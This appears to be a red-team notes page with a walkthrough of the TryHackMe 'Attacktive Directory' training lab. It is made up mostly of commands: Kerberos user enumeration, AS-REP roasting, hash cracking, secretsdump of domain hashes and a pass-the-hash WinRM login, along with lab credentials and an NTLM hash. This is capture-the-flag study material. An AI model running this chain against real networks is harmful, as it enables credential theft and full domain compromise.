🔥
Red Team
  • Welcome
    • About
  • Methodologies & Resources
    • Enumeration
    • Gaining Access
    • Payloads
    • Cheat Sheets
      • Transferring Files
      • Privilege Escalation
        • Linux
          • Scripts
            • Bruteforce su
        • Windows
          • Recon Scripts
      • LFI / RFI
      • Buffer Overflow
        • Fuzzers
      • Command Injection
      • Credential Harvesting
      • Password Attacks
      • Command Injection
      • SQL Injection
      • Bypass File Upload
      • Burp
      • Static Binaries
      • File Info Gathering & Script Abuse
      • Credential Gathering & Cracking
      • Other Cheat sheets
      • Lateral Movement and Pivoting
      • Vulnerabilities Seen
      • Active Directory
      • Web
      • Enumeration & Brute Force
  • Walkthroughs
    • Tryhackme
      • Hydra
        • Container Vulnerabilities
      • Blue
      • Steel Mountain
      • Alfred
      • HackPark
      • Game Zone
      • Skynet
      • Daily Bugle
      • Overpass 2 - Hacked
      • Relevant
      • Internal
      • Buffer Overflow Prep
      • File Inclusion
      • Brainstorm
      • Gatekeeper
      • Brainpan 1
      • Upload Vulnerabilities
      • Pickle Rick
      • John The Ripper
      • Attacktive Directory
      • Weaponization
      • Attacking Kerberos
      • Post-Exploitation Basics
      • Common Linux Privesc
      • Linux PrivEsc
      • Basic Pentesting
      • Net Sec Challenge
      • Linux Privilege Escalation
      • Windows Privilege Escalation
      • Password Attacks
      • The Lay of the land
      • Enumeration
      • Windows Local Persistence
      • Lateral Movement and Pivoting
      • Bypassing UAC
      • Hacking with PowerShell
      • Corp
      • Mr Robot CTF
      • Retro
      • Breaching Active Directory
      • Enumerating Active Directory
      • Exploiting Active Directory
      • Persisting Active Directory
      • Credentials Harvesting
      • Red Team Capstone Challenge
      • Crack the hash
      • Ice
      • Bounty Hunter
      • Agent Sudo
      • LazyAdmin
      • Wgel CTF
      • Cyborg
      • Year of the Rabbit
      • Brute It
      • Lian_Yu
      • ToolsRus
      • Chill Hack
      • Bolt
      • source
      • Brooklyn Nine Nine
      • Anthem
      • GamingServer
      • Chocolate Factory
      • Archangel
      • Easy Peasy
      • ColddBox: Easy
      • Fowsniff CTF
      • Blaster
      • The Cod Caper
      • SQL Injection Lab
      • Agent T
      • Avengers Blog
      • Mustacchio
      • Team
      • Tech_Supp0rt: 1
      • Gallery
      • Jack-of-All-Trades
      • Mother's Secret
      • Traverse
      • Anonforce
      • Dav
      • Thompson
      • VulnNet: Internal
      • Library
      • Flatline
      • b3dr0ck
      • Lesson Learned?
      • Opacity
      • Plotted-TMS
      • GLITCH
      • Hacker vs. Hacker
      • Valley
      • magician
      • HeartBleed
      • Expose
      • dogcat
      • Madeye's Castle
        • Old Madeye's Castle
      • Startup
      • Overpass
      • 0day
      • Mindgames
      • HaskHell
      • Annie
      • ContainMe
      • Develpy
      • Watcher
      • Spring
      • Anonymous
      • Boiler CTF
      • Wonderland
      • Blog
      • Biohazard
      • UltraTech
      • The Marketplace
      • CMesS
      • FINISH - Linux Agency
      • Road
      • Tokyo Ghoul
      • GoldenEye
      • Oh My WebServer
      • HA Joker CTF
      • Ollie
      • Looking Glass
      • VulnNet
      • Olympus
      • Wekor
      • Bookstore
      • biteme
      • CMSpit
      • Peak Hill
      • SQHell
      • Zeno
      • ffuf
      • Burp Suite: Repeater
      • Burp Suite: Intruder
      • Burp Suite: Other Modules
      • Burp Suite: Extensions
      • Linux PrivEsc Arena
      • tomghost
      • The Docker Rodeo
      • Empline
      • The Great Escape
      • VulnNet: Active
      • battery
      • Hip Flask
      • TryHack3M: Bricks Heist
      • One Piece
      • Inferno
      • Kitty
      • AVenger
      • Umbrella
      • Stealth
      • Athena
      • Napping
      • CyberLens
      • Obscure
      • Wordpress: CVE-2021-29447
      • File Inclusion, Path Traversal
      • NoSQL Injection
      • Advanced SQL Injection
      • XXE Injection
      • LDAP Injection
      • XSS
      • DOM-Based Attacks
      • CSRF
      • TryHack3M: Sch3Ma D3Mon
      • PrintNightmare
      • GitLab CVE-2023-7028
      • Python for Pentesters
      • PowerShell for Pentesters
      • Web Enumeration
      • Holo
      • Linux: Local Enumeration
      • Linux Process Analysis
      • Windows Network Analysis
      • Bypass
      • CVE-2023-38408
      • SQLMAP
      • Deja Vu
      • SSTI
      • DNS Manipulation
      • Linux Backdoors
      • Linux Modules
      • RustScan
      • Windows PrivEsc
      • Windows PrivEsc Arena
      • Wreath
Powered by GitBook
On this page
  • Walkthrough
  • Setup
  • username and password custom lists for this machine
  • Welcome to Attacktive Directory
  • netbios-ssn port 139 & microsoft-ds port 445
  • Enumerating Users via Kerberos port 88
  • Abusing Kerberos
  • Back to the Basics
  • netbios-ssn port 139 & microsoft-ds port 445
  • Elevating Privileges within the Domain - WinRM port5985
  • Flag Submission PaneLogin as Administrator
  1. Walkthroughs
  2. Tryhackme

Attacktive Directory

PreviousJohn The RipperNextWeaponization

Last updated 10 months ago

Room Link:

Walkthrough

Setup

Installing Impacket

git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/ && python3 ./setup.py install

Installing Bloodhound and Neo4j

apt install bloodhound neo4j

Installing kerbrute

git clone https://github.com/ropnop/kerbrute.git
cd kerbrute/
make all

username and password custom lists for this machine

wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt

Welcome to Attacktive Directory

Initial Scan

nmap -A $VICTIM

Scan all ports

nmap -sV -sT -O -p 1-65535 $VICTIM

netbios-ssn port 139 & microsoft-ds port 445

enum4linux $VICTIM

The NetBIOS-Domain Name of the machine

Enumerating Users via Kerberos port 88

kerbrute/dist/kerbrute_linux_386 userenum --dc=$VICTIM -d=spookysec.local. userlist.txt

Abusing Kerberos

validusers.txt

james
svc-admin
robin
darkstar
administrator
backup
paradox

svc-admin allows us to get a ticket without a password. The hash type is Kerberos 5 etype 23 AS-REP.

python3.9 /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile validusers.txt -dc-ip $VICTIM spookysec.local/

Cracking the hash we can see the password is management2005

hashcat -m18200 hash.txt passwordlist.txt
hashcat -m18200 hash.txt passwordlist.txt --show

Back to the Basics

netbios-ssn port 139 & microsoft-ds port 445

smbclient -L $VICTIM -U "svc-admin"
Enter WORKGROUP\svc-admin's password: management2005
smbclient \\\\$VICTIM\\backup -U "svc-admin"
smb: \> dir
smb: \> get backup_credentials.txt

Its a base64 encoded username and password. backup@spookysec.local:backup2517860

cat backup_credentials.txt
echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 -d

Elevating Privileges within the Domain - WinRM port5985

python3 /usr/local/bin/secretsdump.py  spookysec.local/backup:backup2517860@$VICTIM > allhashes.txt
cat allhashes.txt | awk -F : '{print $1 ":" $3}' | sort | uniq

Flag Submission PaneLogin as Administrator 

evil-winrm -i $VICTIM -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
https://tryhackme.com/room/attacktivedirectory